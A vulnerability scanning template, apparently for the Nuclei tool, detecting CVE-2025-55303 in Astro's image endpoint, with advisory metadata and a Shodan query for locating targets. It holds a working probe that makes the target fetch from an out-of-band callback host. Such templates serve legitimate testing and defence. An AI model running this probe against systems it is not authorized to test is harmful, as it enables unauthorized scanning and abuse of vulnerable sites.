Astro - Unauthorized Third-Party Image Access

id: CVE-2025-55303

info:
  name: Astro - Unauthorized Third-Party Image Access
  author: theamanrawat
  severity: medium
  description: |
    Astro < 5.13.2 and < 4.16.18 contains an information disclosure vulnerability caused by improper validation of protocol-relative URLs in the image optimization endpoint, letting attackers serve images from unauthorized third-party domains, exploit requires on-demand rendering deployment.
  impact: |
    Attackers can serve images from unauthorized third-party domains, potentially leading to information disclosure or content spoofing.
  remediation: |
    Update to versions 5.13.2 or 4.16.18 or later.
  reference:
    - https://github.com/advisories/GHSA-xf8x-j4p2-f749
    - https://nvd.nist.gov/vuln/detail/CVE-2025-55303
  classification:
    cvss-metrics: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:N/SC:H/SI:H/SA:N
    cvss-score: 6.4
    cve-id: CVE-2025-55303
    epss-score: 0.00599
    epss-percentile: 0.44133
    cwe-id: CWE-79
  metadata:
    verified: true
    max-request: 1
    shodan-query: http.html:"astro"
  tags: cve,cve2025,astro,ssrf,vuln,vkev

http:
  - method: GET
    path:
      - "{{BaseURL}}/_image?href=//{{interactsh-url}}/600x400"

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'interactsh_protocol == "http"'
          - 'contains(header, "image/")'
        condition: and
# digest: 4a0a00473045022004c1a29c7cde0cf0c9c4bfc0e42233e1b47d705b54aea62d765e323114f38d04022100f4d452f69b2d6bfd7ebb73d1ac89adec3fbd3ccccaae8f2de17b75d09ffdb3e9:922c64590222798bb761d5b6d8e72950